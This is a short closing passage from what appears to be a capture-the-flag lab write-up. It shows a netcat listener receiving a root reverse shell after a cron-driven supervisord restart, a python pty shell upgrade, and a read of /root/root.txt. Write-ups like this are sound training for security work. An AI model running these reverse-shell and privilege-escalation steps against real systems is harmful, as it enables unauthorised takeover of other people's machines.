Once the cron job restarted supervisord, our command ran and the reverse shell arrived as root:

u505@kali:/home$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.131.
Ncat: Connection from 10.10.10.131:34955.
whoami
root
python -c "import pty;pty.spawn('/bin/bash')"

Root flag

bash-4.4# cat /root/root.txt
cat /root/root.txt
<ROOT_FLAG>

References

Daniel Simao 13:00, 20 February 2020 (EST)